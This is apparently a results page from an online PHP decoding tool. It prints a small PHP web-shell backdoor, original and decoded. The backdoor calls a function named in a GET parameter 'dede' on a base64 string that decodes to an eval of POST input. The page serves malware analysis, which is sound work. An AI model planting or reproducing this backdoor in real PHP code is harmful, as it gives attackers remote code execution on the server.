Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(key($_GET)=='dede') //call_user_func($_GET['dede'], "@eval($_POST[bs]..
Decoded Output download
<?php
if(key($_GET)=='dede')
//call_user_func($_GET['dede'], "@eval($_POST[bs]);");
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Did this file decode correctly?
Original Code
<?php
if(key($_GET)=='dede')
//call_user_func($_GET['dede'], "@eval($_POST[bs]);");
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Function Calls
| key | 1 |
Stats
| MD5 | d6f03c74e13326e92b7f2921748bd6c5 |
| Eval Count | 0 |
| Decode Time | 105 ms |